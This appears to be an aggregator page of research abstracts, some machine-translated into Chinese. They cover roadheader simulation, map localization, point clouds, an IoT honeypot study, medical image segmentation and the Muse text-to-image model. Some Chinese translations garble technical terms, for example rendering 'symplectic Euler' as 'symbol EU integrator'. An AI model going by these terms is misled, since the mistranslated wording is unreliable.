Roadheader是一款在地下工程和采矿行业中广泛使用的工程机器人。 Roadheader的交互式动力学模拟是无人发掘和虚拟现实训练中的一个基本问题。但是,当前的研究仅基于传统的动画技术或商业游戏引擎。很少有研究将计算机图形的实时物理模拟应用于Roadheader机器人领域。本文旨在介绍一个基于物理的式型型式机器人的模拟系统。为此,提出了基于广义坐标的改进的多体模拟方法。首先,我们的仿真方法描述了基于广义坐标的机器人动力学。与最新方法相比,我们的方法更稳定和准确。数值仿真结果表明,在相同数量的迭代中,我们的方法的错误明显少于游戏引擎。其次,我们对动态迭代采用符号欧盟积分器,而不是传统的四阶runge-kutta(RK4)方法。与其他集成剂相比,在长期模拟过程中,我们的方法在能量漂移方面更加稳定。测试结果表明,我们的系统达到了每秒60帧(FPS)的实时交互性能。此外,我们提出了一种模型格式,用于实施该系统的路障机器人建模。我们的Roadheader的交互式模拟系统满足了交互,准确性和稳定性的要求。
translated by 谷歌翻译
随着自动驾驶行业正在缓慢成熟,视觉地图本地化正在迅速成为尽可能准确定位汽车的标准方法。由于相机或激光镜等视觉传感器返回的丰富数据,研究人员能够构建具有各种细节的不同类型的地图,并使用它们来实现高水平的车辆定位准确性和在城市环境中的稳定性。与流行的SLAM方法相反,视觉地图本地化依赖于预先构建的地图,并且仅通过避免误差积累或漂移来提高定位准确性。我们将视觉地图定位定义为两个阶段的过程。在位置识别的阶段,通过将视觉传感器输出与一组地理标记的地图区域进行比较,可以确定车辆在地图中的初始位置。随后,在MAP指标定位的阶段,通过连续将视觉传感器的输出与正在遍历的MAP的当前区域进行对齐,对车辆在地图上移动时进行了跟踪。在本文中,我们调查,讨论和比较两个阶段的基于激光雷达,基于摄像头和跨模式的视觉图本地化的最新方法,以突出每种方法的优势。
translated by 谷歌翻译
点云语义分段由于其对光线的稳健性而引起了注意。这使其成为自动驾驶的理想语义解决方案。但是,考虑到神经网络的巨大计算负担和带宽的要求,将所有计算都放入车辆电子控制单元(ECU)不高度或实用。在本文中,我们根据范围视图提出了一个轻巧的点云语义分割网络。由于其简单的预处理和标准卷积,在像DPU这样的深度学习加速器上运行时,它是有效的。此外,为自动驾驶汽车构建了近传感器计算系统。在该系统中,放置在LIDAR传感器旁边的基于FPGA的深度学习加速器核心(DPU),以执行点云预处理和分割神经网络。通过仅将后处理步骤留给ECU,该解决方案大大减轻了ECU的计算负担,因此缩短了决策和车辆反应潜伏期。我们的语义分割网络在Xilinx DPU上获得了10帧(FPS),其计算效率为42.5 GOP/w。
translated by 谷歌翻译
点云的不规则性和混乱为点云分析带来了许多挑战。 PointMLP表明几何信息不是点云分析中唯一的关键点。它基于使用几何仿射模块的简单多层感知(MLP)结构实现了有希望的结果。但是,这些类似MLP的结构仅具有固定权重的聚合特征,而不同点特征的语义信息的差异被忽略。因此,我们提出了点特征的新的点矢量表示,以通过使用电感偏置来改善特征聚集。引入矢量表示的方向可以根据语义关系动态调节两个点特征的聚合。基于它,我们设计了一个新颖的Point2vector MLP体系结构。实验表明,与先前的最佳方法相比,它在ScanoBjectNN数据集的分类任务上实现了最新的性能,增加了1%。我们希望我们的方法可以帮助人们更好地了解语义信息在点云分析中的作用,并导致探索更多更好的特征表示或其他方式。
translated by 谷歌翻译
越来越多的东西数量(物联网)设备使得必须了解他们在网络安全方面所面临的真实威胁。虽然蜜罐已经历史上用作诱饵设备,以帮助研究人员/组织更好地了解网络的威胁动态及其影响,因此由于各种设备及其物理连接,IOT设备为此目的构成了独特的挑战。在这项工作中,通过在低互动蜜罐生态系统中观察真实世界攻击者的行为,我们(1)我们(1)介绍了创建多阶段多方面蜜罐生态系统的新方法,逐渐增加了蜜罐的互动的复杂性有了对手,(2)为相机设计和开发了一个低交互蜜罐,允许研究人员对攻击者的目标进行更深入的了解,并且(3)设计了一种创新的数据分析方法来识别对手的目标。我们的蜜罐已经活跃三年了。我们能够在每个阶段收集越来越复杂的攻击数据。此外,我们的数据分析指向蜜罐中捕获的绝大多数攻击活动共享显着的相似性,并且可以集聚集和分组,以更好地了解野外物联网攻击的目标,模式和趋势。
translated by 谷歌翻译
深度学习为许多计算机视觉任务提供了一种强大的新方法。来自航空图像的高度预测是那些从替代旧多视图几何技术的深度学习的部署大大受益的任务之一。这封信提出了一种两级方法,其中首先是多任务神经网络用于预测由单个RGB空中输入图像产生的高度图。我们还包括第二种细化步骤,其中用于产生更高质量的高度图。两个公开数据集的实验表明我们的方法能够产生最先进的结果。代码可在https://github.com/melhousni/dsmnet上获得。
translated by 谷歌翻译
In this chapter, we review and discuss the transformation of AI technology in HCI/UX work and assess how AI technology will change how we do the work. We first discuss how AI can be used to enhance the result of user research and design evaluation. We then discuss how AI technology can be used to enhance HCI/UX design. Finally, we discuss how AI-enabled capabilities can improve UX when users interact with computing systems, applications, and services.
translated by 谷歌翻译
An increasing number of public datasets have shown a marked clinical impact on assessing anatomical structures. However, each of the datasets is small, partially labeled, and rarely investigates severe tumor subjects. Moreover, current models are limited to segmenting specific organs/tumors, which can not be extended to novel domains and classes. To tackle these limitations, we introduce embedding learned from Contrastive Language-Image Pre-training (CLIP) to segmentation models, dubbed the CLIP-Driven Universal Model. The Universal Model can better segment 25 organs and 6 types of tumors by exploiting the semantic relationship between abdominal structures. The model is developed from an assembly of 14 datasets with 3,410 CT scans and evaluated on 6,162 external CT scans from 3 datasets. We rank first on the public leaderboard of the Medical Segmentation Decathlon (MSD) and achieve the state-of-the-art results on Beyond The Cranial Vault (BTCV). Compared with dataset-specific models, the Universal Model is computationally more efficient (6x faster), generalizes better to CT scans from varying sites, and shows stronger transfer learning performance on novel tasks. The design of CLIP embedding enables the Universal Model to be easily extended to new classes without catastrophically forgetting the previously learned classes.
translated by 谷歌翻译
Recent advances in self-supervised learning (SSL) in computer vision are primarily comparative, whose goal is to preserve invariant and discriminative semantics in latent representations by comparing siamese image views. However, the preserved high-level semantics do not contain enough local information, which is vital in medical image analysis (e.g., image-based diagnosis and tumor segmentation). To mitigate the locality problem of comparative SSL, we propose to incorporate the task of pixel restoration for explicitly encoding more pixel-level information into high-level semantics. We also address the preservation of scale information, a powerful tool in aiding image understanding but has not drawn much attention in SSL. The resulting framework can be formulated as a multi-task optimization problem on the feature pyramid. Specifically, we conduct multi-scale pixel restoration and siamese feature comparison in the pyramid. In addition, we propose non-skip U-Net to build the feature pyramid and develop sub-crop to replace multi-crop in 3D medical imaging. The proposed unified SSL framework (PCRLv2) surpasses its self-supervised counterparts on various tasks, including brain tumor segmentation (BraTS 2018), chest pathology identification (ChestX-ray, CheXpert), pulmonary nodule detection (LUNA), and abdominal organ segmentation (LiTS), sometimes outperforming them by large margins with limited annotations.
translated by 谷歌翻译
We present Muse, a text-to-image Transformer model that achieves state-of-the-art image generation performance while being significantly more efficient than diffusion or autoregressive models. Muse is trained on a masked modeling task in discrete token space: given the text embedding extracted from a pre-trained large language model (LLM), Muse is trained to predict randomly masked image tokens. Compared to pixel-space diffusion models, such as Imagen and DALL-E 2, Muse is significantly more efficient due to the use of discrete tokens and requiring fewer sampling iterations; compared to autoregressive models, such as Parti, Muse is more efficient due to the use of parallel decoding. The use of a pre-trained LLM enables fine-grained language understanding, translating to high-fidelity image generation and the understanding of visual concepts such as objects, their spatial relationships, pose, cardinality etc. Our 900M parameter model achieves a new SOTA on CC3M, with an FID score of 6.06. The Muse 3B parameter model achieves an FID of 7.88 on zero-shot COCO evaluation, along with a CLIP score of 0.32. Muse also directly enables a number of image editing applications without the need to fine-tune or invert the model: inpainting, outpainting, and mask-free editing. More results are available at https://muse-model.github.io
translated by 谷歌翻译